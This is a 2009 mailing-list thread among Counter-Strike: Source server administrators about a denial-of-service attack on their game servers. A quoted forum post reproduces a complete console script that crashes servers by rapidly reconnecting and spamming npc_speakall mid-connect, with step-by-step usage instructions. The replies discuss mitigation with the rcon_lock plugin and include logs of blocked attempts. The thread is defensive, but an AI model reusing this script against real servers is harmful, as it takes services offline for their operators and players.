Also, just to clarify one of your earlier points: "I have Rcon Lock installed, this attack still works as it's not calling any commands rather than just calling retry in 0.01second intervals."
It's not the constant rejoining that is causing the crash, it's the mid-connect use of npc_speakall. That's something rcon_lock blocks. On Sun, Aug 23, 2009 at 4:33 AM, P. Bhandal <[email protected]> wrote: > Somebody actually just tried this on my server in the last 10 minutes, and > rcon lock definitely blocked it: > > L 08/23/2009 - 04:21:59: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > L 08/23/2009 - 04:22:00: [rcon_lock.smx] Got half-connected command from > client 71.137.230.203: > > I tried it on my own test server after as well, and "rcon lock" blocked it > there as well. > > > On Sun, Aug 23, 2009 at 4:18 AM, Kyle Sanderson <[email protected]>wrote: > >> Sorry for the double mail, >> Here is a youtube video that I found showing off this exploit. >> http://www.youtube.com/watch?v=8ScKSfsd3TU >> >> Kyle. >> >> On Sun, Aug 23, 2009 at 3:46 AM, Kyle Sanderson <[email protected]> >> wrote: >> >> > I have Rcon Lock installed, this attack still works as it's not calling >> any >> > commands rather than just calling retry in 0.01second intervals. I was >> just >> > thinking about a plugin/script that would ban someones IP for 5 minutes >> > after a person connects 2times in 5 seconds? >> > >> > I don't know if that's even possible, >> > Kyle. >> > >> > >> > On Sun, Aug 23, 2009 at 2:18 AM, P. Bhandal <[email protected]> wrote: >> > >> >> I'm not at home, so I can't test it right now, but I believe >> DeviceNull's >> >> rcon lock plugin blocks clients from sending commands before they are >> >> fully >> >> connected. You can find more details on it here: >> >> >> >> http://forums.alliedmods.net/showthread.php?p=841590 >> >> >> >> On Sun, Aug 23, 2009 at 2:01 AM, Kyle Sanderson <[email protected]> >> >> wrote: >> >> >> >> > Not sure how many of you have encountered this script. But it has >> been >> >> > taking my server down quite a bit lately. Just found the kid on FPSB >> >> > posting >> >> > his script up so here we are. >> >> > >> >> > Hey guys im releasing my Green Null Name Exploit >> >> > (BTW SAVE THIS AS A text file) >> >> > >> >> > >> >> > 1) now u have a .txt file u make a folder in ur c strike called >> >> testscripts >> >> > 2) open the .txt and edit it to make anything you want the symbols in >> >> there >> >> > between letters make the color of your name change so keep those in >> >> there >> >> > 3) put the script in your testscripts folder >> >> > 4) open counter strike and now join a server and put this in console >> >> > Test_StartScript crash.txt >> >> > only leave it as crash.txt if u dont change the name of your file. >> >> > >> >> > Setinfo name " CaM FuCkEd Up ThE SeRvEr... " >> >> > retry >> >> > Test_Wait .75 >> >> > disconnect >> >> > Test_Wait .2 >> >> > setinfo name " CaM FuCkEd Up ThE SeRvEr... " >> >> > Test_Wait .1 >> >> > retry >> >> > Test_Wait .75 >> >> > disconnect >> >> > Test_Wait .2 >> >> > setinfo name " CaM FuCkEd Up ThE SeRvEr... " >> >> > Test_Wait .1 >> >> > retry >> >> > Test_Wait .75 >> >> > disconnect >> >> > Test_Wait .1 >> >> > setinfo name " C a m W i n s " >> >> > >> >> > Test_StartLoop spamcrash >> >> > retry >> >> > Test_Wait 0.01 >> >> > disconnect >> >> > Test_Wait 0.01 >> >> > Test_LoopForNumSeconds spamcrash 1 >> >> > >> >> > Test_Wait .1 >> >> > retry; >> >> > >> >> > Test_StartLoop crash >> >> > npc_speakall >> >> > Test_Wait 0.01 >> >> > Test_LoopForNumSeconds crash 2 >> >> > disconnect; >> >> > >> >> > >> >> > http://www.fpsbanana.com/scripts/5196 >> >> > >> >> > Anyways, hope this helps some of you and maybe a script/patch can be >> >> made >> >> > via sourcemod. I've already blocked the string npc_speakall via >> iptables >> >> > but >> >> > that had no effect (Not even sure if that calls any functions on the >> >> > server.) I'm running CentOS 32bit and a bunch of CS:S servers. >> >> > Kyle. >> >> > _______________________________________________ >> >> > To unsubscribe, edit your list preferences, or view the list >> archives, >> >> > please visit: >> >> > http://list.valvesoftware.com/mailman/listinfo/hlds >> >> > >> >> _______________________________________________ >> >> To unsubscribe, edit your list preferences, or view the list archives, >> >> please visit: >> >> http://list.valvesoftware.com/mailman/listinfo/hlds >> >> >> > >> > >> _______________________________________________ >> To unsubscribe, edit your list preferences, or view the list archives, >> please visit: >> http://list.valvesoftware.com/mailman/listinfo/hlds >> > > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds
